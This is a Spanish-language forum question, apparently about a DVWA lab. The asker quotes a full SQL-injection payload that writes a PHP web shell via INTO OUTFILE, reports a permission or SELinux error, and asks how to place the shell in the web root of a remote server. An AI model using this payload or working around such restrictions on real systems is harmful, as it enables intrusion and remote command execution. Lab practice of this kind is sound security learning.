Mi máquina de ataque ejecuta Kali y el servidor ejecuta CentOS 6.4 con DVWA.
Estoy tratando de escribir un shell a través de una inyección SQL. La carga útil es
' UNION SELECT '', '<?PHP system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/dvwa/shell.php';#
Al enviar me aparece el siguiente error:
No se puede crear / escribir en el archivo 'var / www / html / dvwa / shell.php' (Errcode13)
La búsqueda del problema parece ser un problema de privilegios o SELinux. He observado que si cambio el destino a './shell.php'
, el archivo se guarda en el servidor en /var/lib/mysql
, cuyo propietario es mysql (el propietario de /var/www/html/*
es apache ).
Suponiendo que este es un servidor remoto al que no tengo acceso, ¿cómo podría manejar esta situación para escribir correctamente el shell en /var/www/html/dvwa/
?